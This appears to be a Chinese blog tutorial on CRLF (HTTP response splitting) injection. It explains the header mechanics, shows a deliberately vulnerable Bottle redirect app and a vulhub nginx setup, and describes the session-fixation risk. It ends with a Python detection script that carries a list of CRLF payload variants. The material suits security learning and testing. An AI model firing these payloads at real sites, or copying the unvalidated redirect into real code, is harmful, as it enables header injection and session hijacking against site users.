crlf注入原理

目录

概念

HTTP报文结构与漏洞原理

漏洞检测

Bottle之CRLF漏洞

nginx配置错误之CRLF漏洞

漏洞危害

会话固定

修复建议

漏洞检测POC

概念

• CR：回车，移动到当前行的开始
• LF：换行 ，光标垂直移动到下一行

         了解这个漏洞之前我们需先了解HTTP报文结构

HTTP报文结构与漏洞原理

        在http协议中，http header之间用一个CRLF字符序列分割开来，Head与Body之间用两个CRLF分割开，浏览器根据这两个CRLF来取出HTTP内容并显示出来。

      所以如果用户的输入在http返回包的Header处回显，如重定向

我们就可以通过添加一个crlf来提前结束响应头。如?url=https://www.baidu.com%0d%0aSet-Cookie:12345，浏览器识别到其中存在一个CRLF，就会把其后面的数据当做响应头来处理，提前结束响应头

漏洞检测

        如果请求头中输入的某个值在返回包的header处回显，则可以进行测试。在其后面加上%0d%0aSet-Cookie:12345 ,返回包中存在Set-Cookie字段则存在漏洞，如下Bottle的某个版本存在crlf注入漏洞，通过在请求头部添加CRLF，其之后的内容被当做了另一个响应头进行处理

Bottle之CRLF漏洞

Bottle：一个python web框架

crlf.py

import bottle from bottle import route, run, request @route('/') def index(): crlf_test = request.query.get('url', '') return bottle.redirect(crlf_test) if __name__ == '__main__': bottle.debug(True) run(host='192.168.60.7', port=8081)

执行python crlf.py，访问192.168.60.7:8081/?url=https://www.baidu.com，在请求中拼接%0d%0aSet-Cookie:123，返回包中存在Set-Cookie字段

nginx配置错误之CRLF漏洞

使用vulhub的环境，进入/vulhub-master/nginx/insecure-configuration目录，执行docker-compose up -d启动环境

访问8080端口，并添加%0d%0aset-cookie:123

漏洞危害

        根据插入的CRLF的个数不同，可设置任意的响应头，控制响应正文。具体的危害表现在：会话固定、XSS、缓存病毒攻击、日志伪造等等。

会话固定

什么是会话固定，传送门 -》会话固定

       会话固定：用户登录前和登录后，会话ID(cookie)值是一样的。

       如果服务器存在会话固定漏洞，攻击者通过给访问者事先设定一个sessionID值，然后通过各种手段促使受害者使用这个会话ID通过服务器验证，这样攻击者就可以通过这个会话ID进入受害者的账户。

修复建议

漏洞检测POC

写了一个简单的漏洞检测脚本，payload可以根据需求自行添加

import requests import argparse from requests.packages import urllib3 urllib3.disable_warnings() from colorama import init init(autoreset=True) header={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/ Firefox/78.0' } def url(): des="CRLF注入漏洞POC" parser = argparse.ArgumentParser(description=des) parser.add_argument('--target_url',type=str,help='The target address,example: http://192.168.140.153:8081') args = parser.parse_args() target_url = args.target_url print("[-]CRLF注入漏洞POC") print("[-]正在执行检测...") print("[-]目标地址:",target_url) return target_url def check(target_url): payload=['%E5%98%8A%E5%98%8D%0D%0Aheader:header','%E5%98%8A%E5%98%8D%0Dheader:header','%E5%98%8A%E5%98%8D%0Aheader:header','%E5%98%8A%E5%98%8Dheader:header','%5cr%5cnheader:header','%3F%0D%0Aheader:header','%3F%0Aheader:header','%23%OAheader:header','%23%0D%0Aheader:header','%23%0Aheader:header','%20%0D%0Aheader:header','%20%0Dheader:header','%20%0Aheader:header','%0D%20header:header','%0D%0A%20header:header','%0D%0A%09header:header','%0aheader:header','%0d%0aheader:header', '/%0d%0aheader:header','/?url=https://www.baidu.com%0d%0aheader:header','/?id=%0d%0aheader:header','?url=%0d%0aheader:header','?id=%0d%0aheader:header','%0aheader:header', '%0dheader:header', '%23%0dheader:header', '%3f%0dheader:header', '/%250aheader:header', '/%25250aheader:header', '/%%0a0aheader:header', '/%3f%0dheader:header', '/%23%0dheader:header', '/%25%30aheader:header', '/%25%30%61header:header', '/%u000aheader:header', '/www.baidu.com/%2f%2e%2e%0d%0aheader:header'] result = False for i in payload: url = target_url + i #print(url) try: headers = requests.get(url=url,headers=header,allow_redirects=False,verify=False,timeout=4).headers #print(headers) if 'header' in list(headers): print('\033[0;31m[+]漏洞存在\033[0m') result = True return True break except: pass if not result: print('\033[0;32m[+]漏洞不存在\033[0m') if __name__ == '__main__': target_url = url() check(target_url)

里面有几个小的知识点，因为crlf一般发生在重定向的地方，脚本中在请求一个url的时候会发出两个请求包，第一个是为301重定向的数据包，第二个是访问重定向后的url，而脚本输出请求url的返回的数据的时候只会输出第二个数据包，这里就需用在requests.get中添加allow_redirects=False，禁止访问重定向的url，这样我们就能查看第一个url的返回信息。还有就是requests在访问某个url异常即没有反应的时候会抛出异常然后程序停止，然而我们脚本中需要在url中拼接一个个payload进行访问，每个拼接后的url都要求访问然后查看返回的数据，不能让程序停止，所以要添加try，except:pass，让请求url错误的时候也不会停止程序的运行。

                                          ——心，若没有栖息的地方，到哪都是流浪